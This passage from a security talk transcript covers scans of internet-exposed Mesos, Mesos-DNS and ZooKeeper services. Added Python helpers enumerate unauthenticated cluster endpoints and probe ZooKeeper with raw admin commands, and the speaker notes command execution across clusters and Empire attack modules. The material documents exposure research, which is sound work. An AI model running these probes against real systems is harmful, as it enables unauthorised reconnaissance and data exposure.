guys think my zone-transfer trick worked against? I thought it was going to be 100 percent; it was about fifty percent, and I think that's because it's a newer feature, so only about half of them are up to date. That's my theory, I don't know; you can go do your own research. Okay. You can also interact directly with the Mesos master, so I did a quick scan of that too: how many do you think were directly accessible from the internet? I'll tell you: 41 is what I found. And these are things where, if you just know how to talk to the protocol, you can tell them what to do.
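The two scans just described line up with two unauthenticated HTTP surfaces of that era: Mesos-DNS's REST API on port 8123 and the Mesos master's state endpoint on 5050. The talk doesn't say which exact paths were hit, so treat these as my best guesses; the "zone transfer trick" is consistent with the /v1/enumerate endpoint that only newer Mesos-DNS releases carried, which would also fit the roughly 50 percent hit rate:

```python
# Hypothetical recon helpers; endpoint paths come from the public docs
# of the period, not from the talk's own tooling.

MESOS_DNS_PORT = 8123
MESOS_MASTER_PORT = 5050

def mesos_dns_enumerate_url(host, port=MESOS_DNS_PORT):
    """Mesos-DNS /v1/enumerate dumps every record the resolver knows,
    an AXFR-style full listing of the cluster's service names."""
    return "http://{0}:{1}/v1/enumerate".format(host, port)

def mesos_master_state_url(host, port=MESOS_MASTER_PORT):
    """The master's unauthenticated /master/state.json lists every
    framework, agent, and running task: a cluster map in one request."""
    return "http://{0}:{1}/master/state.json".format(host, port)

# Usage against a lab cluster only (addresses are placeholders):
# import json, urllib.request
# state = json.load(urllib.request.urlopen(mesos_master_state_url("10.0.0.10")))
# print([a["hostname"] for a in state.get("slaves", [])])
```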

You could tell them to execute commands across their entire clusters, so it's kind of a big deal. And then the one I was really surprised about was ZooKeeper. I thought, okay, there are like 50 boxes for each of these other two services, probably about the same for ZooKeeper. Anybody want to take a stab at how many ZooKeeper servers I found on the internet? Three thousand. And the reason is that ZooKeeper predates DCOS and Mesos, so a lot more services require a ZooKeeper. Now, how many of those do you think have authentication enabled? Under twenty percent: eighty-two percent have no authentication on them. So this, in my opinion, is a whole Redis-like situation.
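One quick way to confirm an ensemble is as open as the ones described is ZooKeeper's "four letter word" admin commands, which any client can send over a bare socket when nothing is locked down. This sketch is my own probe, not tooling from the talk, and the hosts and ports in the usage note are placeholders:

```python
import socket

def zk_four_letter(host, port=2181, cmd=b"ruok", timeout=5):
    """Send a ZooKeeper 'four letter word' command (ruok, stat, dump, ...)
    over a raw socket; the server replies and closes the connection.
    'stat' and 'dump' leak version, client, and session details."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(cmd)
        chunks = []
        while True:
            data = s.recv(4096)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks)

def looks_alive(response):
    """A 'ruok' reply of b'imok' means the server answered us with no
    credentials at all, the wide-open case the speakers counted."""
    return response.strip() == b"imok"

# Usage (lab only): looks_alive(zk_four_letter("10.0.0.20"))
```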

It's the situation where you have Redis databases sitting on the internet with no authentication and super-sensitive data in them; I think the same scenario is playing out with ZooKeeper on the internet right now. Technically I didn't release modules for it, but you could get code execution through ZooKeeper, depending on what it's being used for. At the bare minimum, it's super easy to pull up a ZooKeeper GUI, browse over, and view sensitive data. So, that's my last meme. Thanks to these dudes for making Empire, because that's what all the modules are written for; you guys saw them talk right before this. And that's it. If you guys want to talk

or ask any questions, come find us. [Q&A and closing chatter, largely inaudible] Just a quick announcement: closing ceremonies are at 7 p.m. Any one last question? ... Ha, I love that question; best question. I don't know. All right, thanks, guys.